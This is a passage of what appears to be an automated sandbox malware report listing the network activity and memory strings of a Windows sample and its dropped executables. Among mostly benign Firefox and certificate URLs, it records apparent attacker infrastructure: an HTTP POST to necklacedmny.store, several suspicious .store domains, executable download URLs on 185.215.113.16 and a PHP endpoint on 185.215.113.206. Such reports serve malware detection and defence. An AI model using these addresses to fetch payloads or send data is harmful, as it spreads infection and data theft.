"*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}[{incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]][{incognito:null, tabId:null, types
Source: global traffic DNS traffic detected: DNS query: presticitpo.store
Source: global traffic DNS traffic detected: DNS query: crisiwarny.store
Source: global traffic DNS traffic detected: DNS query: fadehairucw.store
Source: global traffic DNS traffic detected: DNS query: thumbystriw.store
Source: global traffic DNS traffic detected: DNS query: necklacedmny.store
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: youtube.com
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: example.org
Source: global traffic DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: push.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: support.mozilla.org
Source: global traffic DNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: www.youtube.com
Source: global traffic DNS traffic detected: DNS query: www.facebook.com
Source: global traffic DNS traffic detected: DNS query: www.wikipedia.org
Source: global traffic DNS traffic detected: DNS query: youtube-ui.l.google.com
Source: global traffic DNS traffic detected: DNS query: star-mini.c10r.facebook.com
Source: global traffic DNS traffic detected: DNS query: dyna.wikimedia.org
Source: global traffic DNS traffic detected: DNS query: www.reddit.com
Source: global traffic DNS traffic detected: DNS query: twitter.com
Source: global traffic DNS traffic detected: DNS query: reddit.map.fastly.net
Source: global traffic DNS traffic detected: DNS query: services.addons.mozilla.org
Source: global traffic DNS traffic detected: DNS query: normandy.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: normandy-cdn.services.mozilla.com
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: necklacedmny.store
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://127.0.0.1:
Source: file.exe, file.exe, 00000000.00000003.2336212320.00000000052E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2336153066.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2336129230.0000000000A75000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: file.exe, 00000000.00000003.2336153066.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2336129230.0000000000A75000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/9k3
Source: file.exe, 00000000.00000003.2336129230.0000000000A75000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2336374803.0000000000A01000.00000004.00000020.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2834293641.0000000000B6A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: file.exe, 00000000.00000003.2336153066.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2336129230.0000000000A75000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exez
Source: efe6fe4127.exe, 00000009.00000003.2831918485.0000000000B76000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: efe6fe4127.exe, 00000009.00000003.2834293641.0000000000B6A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe3f
Source: file.exe, 00000000.00000003.2336153066.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2336129230.0000000000A75000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exeat
Source: file.exe, 00000000.00000003.2336153066.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2336129230.0000000000A75000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exee
Source: file.exe, 00000000.00000003.2336153066.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2336129230.0000000000A75000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exeenn
Source: file.exe, 00000000.00000003.2336153066.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2336129230.0000000000A75000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/p
Source: file.exe, 00000000.00000003.2336374803.00000000009EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16:80/mine/random.exesoft
Source: file.exe, 00000000.00000003.2336374803.00000000009EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16:80/off/def.exe
Source: b76bb5cee7.exe, 0000000A.00000002.2767324044.000000000135E000.00000004.00000020.00020000.00000000.sdmp, b76bb5cee7.exe, 0000001D.00000002.2967959553.000000000150B000.00000004.00000020.00020000.00000000.sdmp, num.exe, 0000001F.00000002.2877033985.000000000081E000.00000004.00000020.00020000.00000000.sdmp, num.exe, 00000030.00000002.3028252435.00000000014B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: b76bb5cee7.exe, 0000000A.00000002.2767324044.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, b76bb5cee7.exe, 0000000A.00000002.2767324044.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, b76bb5cee7.exe, 0000001D.00000002.2967959553.000000000155C000.00000004.00000020.00020000.00000000.sdmp, b76bb5cee7.exe, 0000001D.00000002.2967959553.000000000150B000.00000004.00000020.00020000.00000000.sdmp, num.exe, 0000001F.00000002.2877033985.0000000000861000.00000004.00000020.00020000.00000000.sdmp, num.exe, 0000001F.00000002.2877033985.000000000081E000.00000004.00000020.00020000.00000000.sdmp, num.exe, 00000030.00000002.3028252435.00000000014B8000.00000004.00000020.00020000.00000000.sdmp, num.exe, 00000030.00000002.3028252435.00000000014FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: num.exe, 00000030.00000002.3028252435.00000000014FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
Source: num.exe, 00000030.00000002.3028252435.00000000014B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php.5Y
Source: b76bb5cee7.exe, 0000000A.00000002.2767324044.000000000135E000.00000004.00000020.00020000.00000000.sdmp, b76bb5cee7.exe, 0000000A.00000002.2767324044.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, b76bb5cee7.exe, 0000001D.00000002.2967959553.000000000155C000.00000004.00000020.00020000.00000000.sdmp, num.exe, 00000030.00000002.3028252435.00000000014FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/
Source: num.exe, 00000030.00000002.3028252435.00000000014FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/)
Source: b76bb5cee7.exe, 0000000A.00000002.2767324044.00000000013B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpV
Source: num.exe, 0000001F.00000002.2877033985.000000000081E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpW
Source: b76bb5cee7.exe, 0000000A.00000002.2767324044.00000000013B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpb
Source: num.exe, 0000001F.00000002.2877033985.000000000087E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpf
Source: b76bb5cee7.exe, 0000000A.00000002.2767324044.00000000013B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpz
Source: num.exe, 00000030.00000002.3028252435.00000000014B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/df
Source: b76bb5cee7.exe, 0000001D.00000002.2967959553.000000000155C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/i
Source: b76bb5cee7.exe, 0000001D.00000002.2967959553.000000000155C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/n7a
Source: b76bb5cee7.exe, 0000001D.00000002.2967959553.000000000155C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/p
Source: b76bb5cee7.exe, 0000000A.00000002.2767324044.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, num.exe, 00000030.00000002.3028252435.00000000014FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/ws
Source: b76bb5cee7.exe, 0000000A.00000002.2767324044.000000000135E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206Ey
Source: file.exe, 00000000.00000003.2192287354.000000000550D000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2679239829.0000000005729000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2843082489.00000000061EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.2192287354.000000000550D000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2679239829.0000000005729000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2843082489.00000000061EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: efe6fe4127.exe, 0000000C.00000003.2962012796.0000000001A44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
Source: file.exe, 00000000.00000003.2192287354.000000000550D000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2679239829.0000000005729000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2843082489.00000000061EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.2192287354.000000000550D000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2679239829.0000000005729000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2843082489.00000000061EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.2192287354.000000000550D000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2679239829.0000000005729000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2843082489.00000000061EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.2192287354.000000000550D000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2679239829.0000000005729000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2843082489.00000000061EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.2192287354.000000000550D000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2679239829.0000000005729000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2843082489.00000000061EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: U2242U1STHGPPKHG.exe, 0000001E.00000002.3017329025.0000000000CCC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://go.microsoft.c
Source: firefox.exe, 0000002E.00000003.2993412879.0000020F30ADB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.2998404752.0000020F30AE1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.3054907147.0000020F382E9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.3010408169.0000020F30DC3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.2993614274.0000020F30AC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: file.exe, 00000000.00000003.2192287354.000000000550D000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2679239829.0000000005729000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2843082489.00000000061EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.2192287354.000000000550D000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2679239829.0000000005729000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2843082489.00000000061EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: firefox.exe, 0000002E.00000003.2991326032.0000020F308BB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.2993734232.0000020F30A6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://src.chromium.org/viewvc/chrome/trunk/src/third_party/cld/languages/internal/languages.cc
Source: firefox.exe, 0000002E.00000003.2992240623.0000020F30853000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.google.com
Source: firefox.exe, 0000002E.00000003.2985342764.0000020F2CDAE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.3015343703.0000020F2D163000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.3015863973.0000020F2D1C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.3014817116.0000020F300D8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.2981512771.0000020F2FD38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.2988235090.0000020F2CDAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 0000002E.00000003.2981399452.0000020F2FD43000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul);
Source: firefox.exe, 0000002E.00000003.2981399452.0000020F2FD43000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/newlayout/xml/parsererror.xml);
Source: mozilla-temp-41.26.dr String found in binary or memory: http://www.videolan.org/x264.html
Source: file.exe, 00000000.00000003.2192287354.000000000550D000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2679239829.0000000005729000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2843082489.00000000061EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.2192287354.000000000550D000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2679239829.0000000005729000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2843082489.00000000061EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
Source: firefox.exe, 0000001A.00000003.2835306772.0000025E42431000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2833374978.0000025E4240F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2836337904.0000025E42452000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2832408126.0000025E42200000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: file.exe, 00000000.00000003.2159437631.000000000530A000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649907630.0000000005721000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649658911.0000000005721000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649533430.0000000005724000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2798475825.00000000061FA000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2798265490.00000000062C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 0000002E.00000003.3056553256.0000020F30A15000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/settings/clients
Source: firefox.exe, 0000002E.00000003.3056553256.0000020F30A15000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.comlogowordmark.alwaysVisiblenewNewtabExperience.colorsextensions.pocket.en
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-users/
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: firefox.exe, 0000002E.00000003.3056553256.0000020F30A1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.3056553256.0000020F30A1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.3056553256.0000020F30A1D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://api.accounts.firefox.com/v1
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: file.exe, 00000000.00000003.2193594882.00000000052D4000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2693716552.00000000056ED000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2693541904.00000000056EC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2932128135.00000121573CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2932095953.0000029B41CC7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: file.exe, 00000000.00000003.2193594882.00000000052D4000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2693716552.00000000056ED000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2693541904.00000000056EC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2932128135.00000121573CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2932095953.0000029B41CC7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: firefox.exe, 0000002E.00000003.2988145468.0000020F2F7E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180D
Source: firefox.exe, 0000002E.00000003.2981399452.0000020F2FD43000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1403293
Source: file.exe, 00000000.00000003.2159437631.000000000530A000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649907630.0000000005721000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649658911.0000000005721000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649533430.0000000005724000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2798475825.00000000061FA000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2798265490.00000000062C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
